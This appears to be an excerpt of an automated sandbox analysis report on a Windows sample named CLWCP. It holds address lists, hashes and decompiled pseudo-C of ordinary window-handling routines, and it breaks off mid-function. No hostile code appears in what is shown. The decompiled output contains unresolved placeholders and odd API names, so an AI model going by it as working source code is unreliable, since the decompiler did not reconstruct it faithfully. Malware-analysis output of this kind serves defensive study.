                                  0x00449c08
                                  0x00449c16
                                  0x00449c22
                                  0x00449c30
                                  0x00449c39
                                  0x00449c4e
                                  0x00449c68
                                  0x00449c6d
                                  0x00449c70
                                  0x00449c73
                                  0x00449c78
                                  0x00449c7d
                                  0x00449c8f
                                  0x00449c8f
                                  0x00449864
                                  0x00449867
                                  0x00449999
                                  0x004499a2
                                  0x004499a3
                                  0x004499a5
                                  0x00000000
                                  0x004499ab
                                  0x004499ab
                                  0x004499ac
                                  0x004499ac
                                  0x004499ae
                                  0x004499ba
                                  0x004499bd
                                  0x004499c0
                                  0x004499c3
                                  0x004499ee
                                  0x004499c5
                                  0x004499d2
                                  0x004499d2
                                  0x004499f1
                                  0x004499f5
                                  0x00000000
                                  0x00000000
                                  0x00449a8b
                                  0x00449a8c
                                  0x00449a8c
                                  0x00449a8d
                                  0x00000000
                                  0x00449a93
                                  0x00000000
                                  0x00449a93
                                  0x00000000
                                  0x00449a8d
                                  0x00449a0d
                                  0x00449a12
                                  0x00449a14
                                  0x00449a1b
                                  0x00449a26
                                  0x00449a28
                                  0x00449a28
                                  0x00449a2d
                                  0x00449a35
                                  0x00449a38
                                  0x00449a3a
                                  0x00449a40
                                  0x00449a42
                                  0x00449a49
                                  0x00449a49
                                  0x00449a55
                                  0x00449a5c
                                  0x00449a78
                                  0x00449a81
                                  0x00449a5e
                                  0x00449a6e
                                  0x00449a6e
                                  0x00449a5c
                                  0x00449a3a
                                  0x0044986d
                                  0x00449d2c
                                  0x00449d2f
                                  0x00449d33
                                  0x00449d36
                                  0x00449d3a
                                  0x00449d3d
                                  0x00449d3e
                                  0x00449d43
                                  0x00449d43
                                  0x00449d46
                                  0x00449d48
                                  0x00449d4b
                                  0x00449d4e
                                  0x00449d5b
                                  0x00449d5b
                                  0x0044985e
                                  0x00449857
                                  0x00449852
                                  0x00000000

                                  APIs
                                  • SaveDC.GDI32(?), ref: 00449AF8
                                  • RestoreDC.GDI32(?,?), ref: 00449B6C
                                  • 72E7B080.USER32(?,00000000,00449D5C), ref: 00449BE6
                                  • SaveDC.GDI32(?), ref: 00449C1D
                                  • RestoreDC.GDI32(?,?), ref: 00449C8A
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,00449D5C), ref: 00449D3E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: RestoreSave$B080NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4024241980-0
                                  • Opcode ID: 1fb4e2a48ac0238c1ff480ee32bac1e6ff1ba54309458c1679799e46c463326e
                                  • Instruction ID: 09e57a042879af9c29ac59feede5ade872512784bd6a3cffa02f05b98a09712a
                                  • Opcode Fuzzy Hash: 1fb4e2a48ac0238c1ff480ee32bac1e6ff1ba54309458c1679799e46c463326e
                                  • Instruction Fuzzy Hash: 55E16174A002099FEB10DFAAD48199FF7F5FF88304B6185AAE805A7361C738ED41DB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044EE08, Relevance: 10.8, APIs: 7, Instructions: 327windowCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0044EE08(intOrPtr __eax, struct HWND__** __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				struct HWND__* _v24;
				void* __ebp;
				struct HWND__* _t99;
				intOrPtr _t109;
				intOrPtr _t114;
				intOrPtr _t130;
				intOrPtr _t133;
				struct HWND__* _t139;
				struct HWND__* _t142;
				intOrPtr _t146;
				struct HWND__* _t147;
				intOrPtr _t148;
				intOrPtr _t149;
				struct HWND__* _t151;
				struct HWND__* _t154;
				intOrPtr _t160;
				intOrPtr _t190;
				struct HDC__* _t195;
				struct HWND__** _t218;
				void* _t221;
				struct HWND__* _t239;
				struct HWND__* _t240;
				struct HWND__* _t242;
				void* _t255;
				void* _t256;
				intOrPtr _t262;
				intOrPtr _t270;
				struct HWND__* _t274;
				struct HWND__* _t275;
				struct HWND__* _t276;
				struct HWND__* _t281;
				struct HWND__* _t282;
				struct HWND__* _t283;
				struct HWND__* _t284;
				void* _t286;
				void* _t288;
				intOrPtr _t289;
				void* _t291;
				void* _t295;

				_t286 = _t288;
				_t289 = _t288 + 0xffffffec;
				_t218 = __edx;
				_v8 = __eax;
				_t99 =  *__edx;
				_t239 = _t99;
				_t291 = _t239 - 0x46;
				if(_t291 > 0) {
					_t240 = _t239 - 0xb01a;
					__eflags = _t240;
					if(_t240 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E00403594(_v8, __eflags);
						}
					} else {
						_t242 = _t240 - 1;
						__eflags = _t242;
						if(_t242 == 0) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E00403594(_v8, __eflags);
							}
						} else {
							__eflags = _t242 == 0x2c;
							if(_t242 == 0x2c) {
								_t281 = __edx[1];
								_t274 = 0;
								while(1) {
									__eflags = _t281;
									if(_t281 == 0) {
										break;
									}
									__eflags = _t274;
									if(_t274 == 0) {
										_t274 = E004318A4(_t281, _t221);
										_t281 = GetParent(_t281);
										continue;
									}
									break;
								}
								__eflags = _t274;
								if(_t274 != 0) {
									_t282 = E0044C8E0(_t274, 1);
									_t109 = _v8;
									__eflags = _t274 -  *((intOrPtr*)(_t109 + 0x238));
									if(_t274 !=  *((intOrPtr*)(_t109 + 0x238))) {
										__eflags = _t282;
										if(_t282 != 0) {
											__eflags = _t282 - _v8;
											if(_t282 == _v8) {
												L30:
												_t110 =  *(_t282 + 0x238);
												__eflags =  *(_t282 + 0x238);
												if( *(_t282 + 0x238) != 0) {
													__eflags = 0;
													E00435DE4(_t110, 0, 8, 0);
												}
												 *((intOrPtr*)(_t282->i + 0xf4))();
											} else {
												_t114 =  *0x470b44; // 0x0
												__eflags = _t282 -  *((intOrPtr*)(_t114 + 0x68));
												if(_t282 !=  *((intOrPtr*)(_t114 + 0x68))) {
													goto L30;
												}
											}
										}
									}
								}
							} else {
								goto L54;
							}
						}
					}
					goto L56;
				} else {
					if(_t291 == 0) {
						_t130 = _v8;
						__eflags = ( *0x44f2cc & 0x0000ffff) - ( *(_t130 + 0x1c) & 0x0000ffff &  *0x44f2c8);
						if(( *0x44f2cc & 0x0000ffff) == ( *(_t130 + 0x1c) & 0x0000ffff &  *0x44f2c8)) {
							_t133 = _v8;
							__eflags = ( *(_t133 + 0x248) & 0x000000ff) - 0xffffffffffffffff;
							if(( *(_t133 + 0x248) & 0x000000ff) - 0xffffffffffffffff < 0) {
								_t146 = _v8;
								__eflags =  *((char*)(_t146 + 0x243)) - 2;
								if( *((char*)(_t146 + 0x243)) != 2) {
									_t147 = __edx[2];
									_t33 = _t147 + 0x18;
									 *_t33 =  *(_t147 + 0x18) | 0x00000002;
									__eflags =  *_t33;
								}
							}
							_t139 = ( *(_v8 + 0x248) & 0x000000ff) - 1;
							__eflags = _t139;
							if(_t139 == 0) {
								L43:
								_t142 = ( *(_v8 + 0x241) & 0x000000ff) - 2;
								__eflags = _t142;
								if(_t142 == 0) {
									L45:
									 *( *((intOrPtr*)(_t218 + 8)) + 0x18) =  *( *((intOrPtr*)(_t218 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t142 == 3;
									if(_t142 == 3) {
										goto L45;
									}
								}
							} else {
								__eflags = _t139 == 2;
								if(_t139 == 2) {
									goto L43;
								}
							}
						}
						goto L56;
					} else {
						_t255 = _t239 + 0xfffffffa - 3;
						if(_t255 < 0) {
							__eflags =  *0x46ef44;
							if( *0x46ef44 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L56;
								} else {
									_t148 = _v8;
									__eflags =  *(_t148 + 0x1c) & 0x00000010;
									if(( *(_t148 + 0x1c) & 0x00000010) != 0) {
										goto L56;
									} else {
										_t283 = 0;
										_t149 = _v8;
										__eflags =  *((char*)(_t149 + 0x247)) - 2;
										if( *((char*)(_t149 + 0x247)) != 2) {
											_t151 =  *(_v8 + 0x238);
											__eflags = _t151;
											if(_t151 != 0) {
												__eflags = _t151 - _v8;
												if(_t151 != _v8) {
													_t283 = E0043BA58(_t151);
												}
											}
										} else {
											_t154 = E0044F850(_v8);
											__eflags = _t154;
											if(_t154 != 0) {
												_t283 = E0043BA58(E0044F850(_v8));
											}
										}
										__eflags = _t283;
										if(_t283 == 0) {
											goto L56;
										} else {
											_t99 = SetFocus(_t283);
										}
									}
								}
							}
							goto L57;
						} else {
							_t256 = _t255 - 0x22;
							if(_t256 == 0) {
								_v24 = __edx[2];
								__eflags = _v24->i - 1;
								if(_v24->i != 1) {
									goto L56;
								} else {
									_t160 = _v8;
									__eflags =  *(_t160 + 0x260);
									if( *(_t160 + 0x260) == 0) {
										goto L56;
									} else {
										_t275 = E004488BC( *((intOrPtr*)(_v8 + 0x260)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t275;
										if(_t275 == 0) {
											goto L56;
										} else {
											_v16 = E0041DFC8(0, 1);
											_push(_t286);
											_push(0x44f113);
											_push( *[fs:eax]);
											 *[fs:eax] = _t289;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t286);
											_push(0x44f0f6);
											_push( *[fs:eax]);
											 *[fs:eax] = _t289;
											E0041E958(_v16,  *(_v24 + 0x18));
											E0041E7EC(_v16);
											E0044A020(_t275, _v24 + 0x1c, _v16,  *(_v24 + 0x10) & 0x0000ffff);
											_pop(_t262);
											 *[fs:eax] = _t262;
											_push(0x44f0fd);
											__eflags = 0;
											E0041E958(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t256 == 1) {
									_t284 = __edx[2];
									__eflags = _t284->i - 1;
									if(_t284->i != 1) {
										goto L56;
									} else {
										_t190 = _v8;
										__eflags =  *(_t190 + 0x260);
										if( *(_t190 + 0x260) == 0) {
											goto L56;
										} else {
											_t276 = E004488BC( *((intOrPtr*)(_v8 + 0x260)), 0,  *((intOrPtr*)(_t284 + 8)));
											__eflags = _t276;
											if(_t276 == 0) {
												goto L56;
											} else {
												_t195 = E0043BA58(_v8);
												L004067EC();
												_v20 = _t195;
												 *[fs:eax] = _t289;
												_v16 = E0041DFC8(0, 1);
												 *[fs:eax] = _t289;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t289;
												E0041E958(_v16, _v20);
												E0041E7EC(_v16);
												 *((intOrPtr*)(_t276->i + 0x38))(_t284 + 0x10,  *[fs:eax], 0x44f1fd, _t286,  *[fs:eax], 0x44f21a, _t286,  *[fs:eax], 0x44f241, _t286, _t195);
												_pop(_t270);
												 *[fs:eax] = _t270;
												_push(0x44f204);
												__eflags = 0;
												E0041E958(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L54:
									_t295 = _t99 -  *0x470b4c; // 0xc075
									if(_t295 == 0) {
										E00435DE4(_v8, 0, 0xb025, 0);
										E00435DE4(_v8, 0, 0xb024, 0);
										E00435DE4(_v8, 0, 0xb035, 0);
										E00435DE4(_v8, 0, 0xb009, 0);
										E00435DE4(_v8, 0, 0xb008, 0);
										E00435DE4(_v8, 0, 0xb03d, 0);
									}
									L56:
									_t99 = E00439164(_v8, _t218);
									L57:
									return _t99;
								}
							}
						}
					}
				}
			}














































                                  0x0044ee09
                                  0x0044ee0b
                                  0x0044ee11
                                  0x0044ee13
                                  0x0044ee16
                                  0x0044ee18
                                  0x0044ee1a
                                  0x0044ee1d
                                  0x0044ee42
                                  0x0044ee42
                                  0x0044ee48
                                  0x0044ef83
                                  0x0044ef8a
                                  0x0044ef97
                                  0x0044ef97
                                  0x0044ee4e
                                  0x0044ee4e
                                  0x0044ee4e
                                  0x0044ee4f
                                  0x0044ef62
                                  0x0044ef69
                                  0x0044ef76
                                  0x0044ef76
                                  0x0044ee55
                                  0x0044ee55
                                  0x0044ee58
                                  0x0044eed9
                                  0x0044eedc
                                  0x0044eef1
                                  0x0044eef1
                                  0x0044eef3
                                  0x00000000
                                  0x00000000
                                  0x0044eef5
                                  0x0044eef7
                                  0x0044eee7
                                  0x0044eeef
                                  0x00000000
                                  0x0044eeef
                                  0x00000000
                                  0x0044eef7
                                  0x0044eef9
                                  0x0044eefb
                                  0x0044ef0a
                                  0x0044ef0c
                                  0x0044ef0f
                                  0x0044ef15
                                  0x0044ef1b
                                  0x0044ef1d
                                  0x0044ef23
                                  0x0044ef26
                                  0x0044ef36
                                  0x0044ef36
                                  0x0044ef3c
                                  0x0044ef3e
                                  0x0044ef42
                                  0x0044ef49
                                  0x0044ef49
                                  0x0044ef54
                                  0x0044ef28
                                  0x0044ef28
                                  0x0044ef2d
                                  0x0044ef30
                                  0x00000000
                                  0x00000000
                                  0x0044ef30
                                  0x0044ef26
                                  0x0044ef1d
                                  0x0044ef15
                                  0x0044ee5a
                                  0x00000000
                                  0x0044ee5a
                                  0x0044ee58
                                  0x0044ee4f
                                  0x00000000
                                  0x0044ee1f
                                  0x0044ee1f
                                  0x0044efa1
                                  0x0044efb6
                                  0x0044efb9
                                  0x0044efbf
                                  0x0044efca
                                  0x0044efcc
                                  0x0044efce
                                  0x0044efd1
                                  0x0044efd8
                                  0x0044efda
                                  0x0044efdd
                                  0x0044efdd
                                  0x0044efdd
                                  0x0044efdd
                                  0x0044efd8
                                  0x0044efeb
                                  0x0044efeb
                                  0x0044efed
                                  0x0044eff7
                                  0x0044f001
                                  0x0044f001
                                  0x0044f003
                                  0x0044f00d
                                  0x0044f010
                                  0x0044f005
                                  0x0044f005
                                  0x0044f007
                                  0x00000000
                                  0x00000000
                                  0x0044f007
                                  0x0044efef
                                  0x0044efef
                                  0x0044eff1
                                  0x00000000
                                  0x00000000
                                  0x0044eff1
                                  0x0044efed
                                  0x00000000
                                  0x0044ee25
                                  0x0044ee28
                                  0x0044ee2b
                                  0x0044ee5f
                                  0x0044ee66
                                  0x0044ee6c
                                  0x0044ee6f
                                  0x00000000
                                  0x0044ee75
                                  0x0044ee75
                                  0x0044ee78
                                  0x0044ee7c
                                  0x00000000
                                  0x0044ee82
                                  0x0044ee82
                                  0x0044ee84
                                  0x0044ee87
                                  0x0044ee8e
                                  0x0044eeb0
                                  0x0044eeb6
                                  0x0044eeb8
                                  0x0044eeba
                                  0x0044eebd
                                  0x0044eec4
                                  0x0044eec4
                                  0x0044eebd
                                  0x0044ee90
                                  0x0044ee93
                                  0x0044ee98
                                  0x0044ee9a
                                  0x0044eea9
                                  0x0044eea9
                                  0x0044ee9a
                                  0x0044eec6
                                  0x0044eec8
                                  0x00000000
                                  0x0044eece
                                  0x0044eecf
                                  0x0044eecf
                                  0x0044eec8
                                  0x0044ee7c
                                  0x0044ee6f
                                  0x00000000
                                  0x0044ee2d
                                  0x0044ee2d
                                  0x0044ee30
                                  0x0044f01c
                                  0x0044f022
                                  0x0044f025
                                  0x00000000
                                  0x0044f02b
                                  0x0044f02b
                                  0x0044f02e
                                  0x0044f035
                                  0x00000000
                                  0x0044f03b
                                  0x0044f051
                                  0x0044f053
                                  0x0044f055
                                  0x00000000
                                  0x0044f05b
                                  0x0044f067
                                  0x0044f06c
                                  0x0044f06d
                                  0x0044f072
                                  0x0044f075
                                  0x0044f084
                                  0x0044f089
                                  0x0044f08a
                                  0x0044f08f
                                  0x0044f092
                                  0x0044f09e
                                  0x0044f0b1
                                  0x0044f0c9
                                  0x0044f0d0
                                  0x0044f0d3
                                  0x0044f0d6
                                  0x0044f0db
                                  0x0044f0e0
                                  0x0044f0f5
                                  0x0044f0f5
                                  0x0044f055
                                  0x0044f035
                                  0x0044ee36
                                  0x0044ee37
                                  0x0044f11a
                                  0x0044f11d
                                  0x0044f120
                                  0x00000000
                                  0x0044f126
                                  0x0044f126
                                  0x0044f129
                                  0x0044f130
                                  0x00000000
                                  0x0044f136
                                  0x0044f149
                                  0x0044f14b
                                  0x0044f14d
                                  0x00000000
                                  0x0044f153
                                  0x0044f156
                                  0x0044f15c
                                  0x0044f161
                                  0x0044f16f
                                  0x0044f17e
                                  0x0044f18c
                                  0x0044f198
                                  0x0044f1a6
                                  0x0044f1af
                                  0x0044f1c2
                                  0x0044f1d5
                                  0x0044f1da
                                  0x0044f1dd
                                  0x0044f1e0
                                  0x0044f1e5
                                  0x0044f1ea
                                  0x0044f1fc
                                  0x0044f1fc
                                  0x0044f14d
                                  0x0044f130
                                  0x0044ee3d
                                  0x0044f248
                                  0x0044f248
                                  0x0044f24e
                                  0x0044f25c
                                  0x0044f26d
                                  0x0044f27e
                                  0x0044f28f
                                  0x0044f2a0
                                  0x0044f2b1
                                  0x0044f2b1
                                  0x0044f2b6
                                  0x0044f2bb
                                  0x0044f2c0
                                  0x0044f2c6
                                  0x0044f2c6
                                  0x0044ee37
                                  0x0044ee30
                                  0x0044ee2b
                                  0x0044ee1f

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: RestoreSave$B080Focus
                                  • String ID:
                                  • API String ID: 809140284-0
                                  • Opcode ID: c1000b6fd7469b59d075527098db081a5f4eb8dd0df2819162cf3bd1692ab139
                                  • Instruction ID: 0f80a1b3848f0665af197b3bcb2ec70a2cd127db36cc255f33338636449eb934
                                  • Opcode Fuzzy Hash: c1000b6fd7469b59d075527098db081a5f4eb8dd0df2819162cf3bd1692ab139
                                  • Instruction Fuzzy Hash: 62C18C35A00504DFEB10DFA9C986AAEB7F1BB48304F2540F6F804AB351DB79AE45DB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00455CB0, Relevance: 9.1, APIs: 6, Instructions: 89windownativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 41%
                                  			E00455CB0(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t53;
				int _t63;

				_t53 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t53 + 0x30));
					if( *((intOrPtr*)(_t53 + 0x44)) == 0 ||  *((char*)(_t53 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t53 + 0x44)) + 0x57)) == 0) {
						L6:
						E00454954( *(_t53 + 0x30), 9, __eflags);
					} else {
						_t63 = IsWindowEnabled(E0043BA58( *((intOrPtr*)(_t53 + 0x44))));
						if(_t63 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t53 + 0x30));
							L004065DC();
						}
					}
					_t26 =  *0x46fb00; // 0x470904
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t63 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x46fb00; // 0x470904
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t63 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t53 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t53 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x243)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E0044FFB8(_t36, 0);
						E00452918( *((intOrPtr*)(_t53 + 0x44)));
					}
					E004551A4(_t53);
					E00455280(_t53, 1);
					_t21 =  *0x470b44; // 0x0
					_t58 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E0043BA58(_t58));
					}
					if( *((short*)(_t53 + 0x14a)) != 0) {
						return  *((intOrPtr*)(_t53 + 0x148))();
					}
				}
				return _t21;
			}











                                  0x00455cb2
                                  0x00455cb8
                                  0x00455cbf
                                  0x00455cc9
                                  0x00455cd2
                                  0x00455d0c
                                  0x00455d14
                                  0x00455ce3
                                  0x00455cf1
                                  0x00455cf3
                                  0x00000000
                                  0x00455cf5
                                  0x00455cf5
                                  0x00455cf7
                                  0x00455cfc
                                  0x00455d04
                                  0x00455d05
                                  0x00455d05
                                  0x00455cf3
                                  0x00455d21
                                  0x00455d2a
                                  0x00455d2c
                                  0x00455d2e
                                  0x00455d2e
                                  0x00455d34
                                  0x00455d3d
                                  0x00455d3f
                                  0x00455d41
                                  0x00455d41
                                  0x00455d4b
                                  0x00455d50
                                  0x00455d55
                                  0x00455d68
                                  0x00455d70
                                  0x00455d70
                                  0x00455d77
                                  0x00455d80
                                  0x00455d85
                                  0x00455d8a
                                  0x00455d8f
                                  0x00455d99
                                  0x00455d99
                                  0x00455da6
                                  0x00000000
                                  0x00455db0
                                  0x00455da6
                                  0x00455db8

                                  APIs
                                  • IsIconic.USER32 ref: 00455CB8
                                  • SetActiveWindow.USER32(?,?,?,?,004556BA,00000000,00455B85), ref: 00455CC9
                                  • IsWindowEnabled.USER32(00000000), ref: 00455CEC
                                  • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,004556BA,00000000,00455B85), ref: 00455D05
                                  • SetWindowPos.USER32(?,00000000,00000000,?,?,004556BA,00000000,00455B85), ref: 00455D4B
                                  • SetFocus.USER32(00000000,?,00000000,00000000,?,?,004556BA,00000000,00455B85), ref: 00455D99
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                  • String ID:
                                  • API String ID: 3996302123-0
                                  • Opcode ID: fb014da5266c4c16b6f7053b04469e66e8697bc3dc2c3197cee4a033a0f1df3b
                                  • Instruction ID: 5a2f7ce4cfdb644451eb6710542262997155accf482319792de41ac61588b825
                                  • Opcode Fuzzy Hash: fb014da5266c4c16b6f7053b04469e66e8697bc3dc2c3197cee4a033a0f1df3b
                                  • Instruction Fuzzy Hash: 623132717006409BEB11EB69CD99B6A27A8AF04705F045076FE00DF2D7D67DEC4C8759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043B440, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E0043B440(intOrPtr* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				int _t52;
				intOrPtr* _t53;
				int _t58;
				int _t60;

				_t58 = __ecx;
				_t60 = __edx;
				_t53 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E0043BD58(_t53) == 0 || IsIconic( *(_t53 + 0x188)) != 0) {
						 *(_t53 + 0x40) = _t60;
						 *(_t53 + 0x44) = _t58;
						 *((intOrPtr*)(_t53 + 0x48)) = _a8;
						 *((intOrPtr*)(_t53 + 0x4c)) = _a4;
						if(E0043BD58(_t53) != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t53 + 0x188),  &_v48);
							E0043452C(_t53,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t53 + 0x188),  &_v48);
						}
					} else {
						SetWindowPos( *(_t53 + 0x188), 0, _t60, _t58, _a8, _a4, 0x14);
					}
					E004341BC(_t53);
					return  *((intOrPtr*)( *_t53 + 0x5c))();
				} else {
					_t52 = _a4;
					if(_t52 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t52;
					}
					goto L4;
				}
			}










                                  0x0043b449
                                  0x0043b44b
                                  0x0043b44d
                                  0x0043b452
                                  0x0043b46d
                                  0x0043b476
                                  0x0043b4a4
                                  0x0043b4a7
                                  0x0043b4ad
                                  0x0043b4b3
                                  0x0043b4bf
                                  0x0043b4c1
                                  0x0043b4d3
                                  0x0043b4dd
                                  0x0043b4e8
                                  0x0043b4e9
                                  0x0043b4ea
                                  0x0043b4eb
                                  0x0043b4f7
                                  0x0043b4f7
                                  0x0043b488
                                  0x0043b49d
                                  0x0043b49d
                                  0x0043b4fe
                                  0x00000000
                                  0x0043b461
                                  0x0043b461
                                  0x0043b467
                                  0x0043b510
                                  0x0043b510
                                  0x00000000
                                  0x0043b467

                                  APIs
                                  • IsIconic.USER32 ref: 0043B47F
                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043B49D
                                  • GetWindowPlacement.USER32(?,0000002C), ref: 0043B4D3
                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043B4F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$Placement$Iconic
                                  • String ID: ,
                                  • API String ID: 568898626-3772416878
                                  • Opcode ID: 31b7f604ee925892cdeaf68c8ac4d391b8badba892ade3640f10d795a3759762
                                  • Instruction ID: c811ad25a5ff51377b337d87554d198d794822adca6e6ca1eb4e006a83861541
                                  • Opcode Fuzzy Hash: 31b7f604ee925892cdeaf68c8ac4d391b8badba892ade3640f10d795a3759762
                                  • Instruction Fuzzy Hash: 4E213D71600204ABCF54EF69D8C0ACA77A8EF58314F00946AFE14EF213D779E9448BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00425458, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00425458(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x47092d != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E004253C8( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x470908; // 0x425458
				 *0x470908 = E0042525C(1, _t19, _t21, __edi, _t23);
				return  *0x470908(_t23, _t19);
			}










                                  0x00425460
                                  0x00425463
                                  0x0042546d
                                  0x00425497
                                  0x004254a8
                                  0x004254bb
                                  0x004254aa
                                  0x004254af
                                  0x004254af
                                  0x00000000
                                  0x004254c5
                                  0x00000000
                                  0x00425499
                                  0x00425474
                                  0x00425481
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID: MonitorFromWindow$XTB
                                  • API String ID: 190572456-2855592348
                                  • Opcode ID: 0bd57dbfd4fe034ee3467546fc4a3bfcb67cf5c19c73e596f4cd550d199d7355
                                  • Instruction ID: a08b6d51f10c2da5b72c8f38d320b22b71717a108d657d3bd89b7038703973bf
                                  • Opcode Fuzzy Hash: 0bd57dbfd4fe034ee3467546fc4a3bfcb67cf5c19c73e596f4cd550d199d7355
                                  • Instruction Fuzzy Hash: 5101A7B27025289A9700FB51AC41ABFF36CDF04315B808527F91993242D73CAD8147BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00455BEC, Relevance: 7.6, APIs: 5, Instructions: 62nativewindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E00455BEC(void* __eax) {
				int _t21;
				int _t37;
				int _t39;
				struct HWND__* _t41;
				void* _t45;

				_t45 = __eax;
				_t1 = _t45 + 0x30; // 0x61572065
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E00455144();
					_t2 = _t45 + 0x30; // 0x61572065
